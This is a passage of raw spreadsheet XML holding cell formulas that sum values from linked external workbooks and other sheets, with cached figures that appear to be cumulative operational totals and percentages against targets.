      </c>
      <c r="T9" s="198">
        <f>'[10]15'!$Y$109</f>
        <v>271.466195389167</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]15'!$T$109</f>
        <v>48.625</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]15'!$U$109</f>
        <v>28.1944444444444</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]15'!$V$109</f>
        <v>34.5879894937917</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]15'!$Q$109</f>
        <v>11.67</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]15'!$R$109</f>
        <v>101.5</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]15'!$S$109</f>
        <v>2897.09</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]15'!$D$25+'[11]15'!$D$20+'[12]15'!$D$21+'[13]15'!$D$28+'[14]15'!$D$12+'[14]15'!$D$19+'[15]15'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]15'!$E$25+'[11]15'!$E$20+'[12]15'!$E$21+'[13]15'!$E$28+'[14]15'!$E$12+'[14]15'!$E$19+'[15]15'!$E$11</f>
        <v>3681</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'14'!H10</f>
        <v>30739</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>948266.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]15'!$I$25+'[11]15'!$I$20+'[12]15'!$I$21+'[13]15'!$I$28+'[14]15'!$E$27+'[14]15'!$E$34+'[15]15'!$H$11</f>
        <v>3013.2</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'14'!K10</f>
        <v>43171.38</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>940400.1</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]15'!$L$25+'[11]15'!$L$20+'[12]15'!$L$21+'[13]15'!$L$28+'[14]15'!$H$27+'[14]15'!$H$34+'[15]15'!$K$11</f>
        <v>48774.562</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]15'!$W$110</f>
        <v>276.263924592973</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]15'!$X$110</f>
        <v>258.335371321431</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]15'!$Y$110</f>
        <v>268.404041943653</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]15'!$T$110</f>
        <v>48.625</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]15'!$U$110</f>
        <v>34.075</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]15'!$V$110</f>
        <v>34.4643027698185</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]15'!$Q$110</f>
        <v>11.67</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]15'!$R$110</f>
        <v>122.67</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]15'!$S$110</f>
        <v>2886.73</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]15'!$D$26+'[11]15'!$D$21+'[12]15'!$D$19+'[13]15'!$D$29+'[14]15'!$D$13+'[14]15'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]15'!$E$26+'[11]15'!$E$21+'[12]15'!$E$19+'[13]15'!$E$29+'[14]15'!$E$13+'[14]15'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'14'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]15'!$I$26+'[11]15'!$I$21+'[12]15'!$I$19+'[13]15'!$I$29+'[14]15'!$E$28+'[14]15'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'14'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]15'!$L$26+'[11]15'!$L$21+'[12]15'!$L$19+'[13]15'!$L$29+'[14]15'!$H$28+'[14]15'!$H$35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6600.86000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'14'!H12</f>
        <v>134851.86</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5077243.11</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>15941.725</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'14'!K12</f>
        <v>261680.833</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5290787.209</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>278679.25200005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>63.4804674259796</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]15'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]15'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]15'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]15'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]15'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]15'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]15'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]15'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]15'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'14'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'14'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>51.1338077064313</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]15'!$W$68</f>
        <v>259</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]15'!$X$68</f>
        <v>262.069343065693</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]15'!$Y$68</f>
        <v>266.18554196418</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]15'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]15'!$U$68</f>
        <v>76.1111111111111</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]15'!$V$68</f>
        <v>71.7470152817574</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]15'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]15'!$R$68</f>
        <v>274.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]15'!$S$68</f>
        <v>6009.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>1876</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'14'!H14</f>
        <v>38592</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1003135.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>5939.91</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'14'!K14</f>
        <v>81878.885</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1874822.991</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>60936.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]15'!$W$71</f>
        <v>227.797001153403</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]15'!$X$71</f>
        <v>217.765265006716</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]15'!$Y$71</f>
        <v>213.696126613714</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]15'!$T$71</f>
        <v>36.125</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]15'!$U$71</f>
        <v>53.7722222222222</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]15'!$V$71</f>
        <v>50.3829990448902</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]15'!$Q$71</f>
        <v>8.67</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]15'!$R$71</f>
        <v>193.58</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]15'!$S$71</f>
        <v>4220.08</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'14'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>127.145</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'14'!K15</f>
        <v>4747.778</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>119504.278</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]15'!$W$72</f>
        <v>65.2666666666667</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]15'!$X$72</f>
        <v>62.8046509703314</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]15'!$Y$72</f>
        <v>61.3695051471288</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]15'!$T$72</f>
        <v>62.5</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]15'!$U$72</f>
        <v>67.1305555555555</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]15'!$V$72</f>
        <v>51.4585721107927</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]15'!$Q$72</f>
        <v>15.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]15'!$R$72</f>
        <v>241.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]15'!$S$72</f>
        <v>4310.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'14'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'14'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]15'!$W$73</f>
        <v>62.9333333333333</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]15'!$X$73</f>
        <v>60.1522737617412</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]15'!$Y$73</f>
        <v>62.7662870559817</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]15'!$T$73</f>
        <v>62.5</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]15'!$U$73</f>
        <v>67.1305555555555</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]15'!$V$73</f>
        <v>52.9832855778415</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]15'!$Q$73</f>
        <v>15.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]15'!$R$73</f>
        <v>241.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]15'!$S$73</f>
        <v>4437.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'14'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'14'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]15'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]15'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]15'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]15'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]15'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]15'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]15'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]15'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]15'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'14'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'14'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]15'!$W$74</f>
        <v>216.6</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]15'!$X$74</f>
        <v>217.2</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]15'!$Y$74</f>
        <v>222.059043410363</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]15'!$T$74</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]15'!$U$74</f>
        <v>11.1111111111111</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]15'!$V$74</f>
        <v>7.18636580706781</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]15'!$Q$74</f>
        <v>10</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]15'!$R$74</f>
        <v>40</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]15'!$S$74</f>
        <v>601.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'14'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'14'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]15'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]15'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]15'!$Y$72</f>
        <v>9.12921348314607e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]15'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]15'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]15'!$V$72</f>
        <v>4.25023877745941e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]15'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]15'!$R$72</f>
        <v>1.5e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]15'!$S$72</f>
        <v>0.000356</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'14'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'14'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]15'!$W$73</f>
        <v>133.631898044483</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]15'!$X$73</f>
        <v>133.631248448411</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]15'!$Y$73</f>
        <v>239.247248272223</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]15'!$T$73</f>
        <v>12.0000041666667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]15'!$U$73</f>
        <v>0.800004166666666</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]15'!$V$73</f>
        <v>69.0617282234957</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]15'!$Q$73</f>
        <v>2.880001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]15'!$R$73</f>
        <v>2.880015</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]15'!$S$73</f>
        <v>5784.610356</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]15'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]15'!$E$22</f>
        <v>9612</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'14'!H21</f>
        <v>103638</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2213076</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]15'!$I$22</f>
        <v>8564.66</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'14'!K21</f>
        <v>119725.62</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2186179.62</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]15'!$L$22</f>
        <v>66965.69</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>142.480191489362</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]15'!$W$81</f>
        <v>291.875</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]15'!$X$81</f>
        <v>281.291190028063</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]15'!$Y$81</f>
        <v>275.953276416928</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]15'!$T$81</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]15'!$U$81</f>
        <v>41.0782407407407</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]15'!$V$81</f>
        <v>36.3376910219675</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]15'!$Q$81</f>
        <v>8</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]15'!$R$81</f>
        <v>147.881666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]15'!$S$81</f>
        <v>3043.645</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]15'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]15'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'14'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]15'!$I$17</f>
        <v>7807.58</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'14'!K22</f>
        <v>99707.65</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1991169.03</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]15'!$L$17</f>
        <v>152918.702</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>76.459351</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]15'!$W$79</f>
        <v>93.1636363636363</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]15'!$X$79</f>
        <v>100.273104325852</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]15'!$Y$79</f>
        <v>102.16384345336</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]15'!$T$79</f>
        <v>19.0972222222222</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]15'!$U$79</f>
        <v>51.4206790123457</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]15'!$V$79</f>
        <v>45.6384113339701</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]15'!$Q$79</f>
        <v>4.58333333333334</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]15'!$R$79</f>
        <v>185.114444444444</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]15'!$S$79</f>
        <v>3822.67333333333</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]15'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]15'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'14'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]15'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'14'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]15'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]15'!$W$80</f>
        <v>87.0545454545454</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]15'!$X$80</f>
        <v>85.0235341281979</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]15'!$Y$80</f>
        <v>79.4479538834802</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]15'!$T$80</f>
        <v>19.0972222222222</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]15'!$U$80</f>
        <v>41.5734567901235</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]15'!$V$80</f>
        <v>32.8858676907567</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]15'!$Q$80</f>
        <v>4.58333333333334</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]15'!$R$80</f>
        <v>149.664444444444</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]15'!$S$80</f>
        <v>2754.52027777778</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
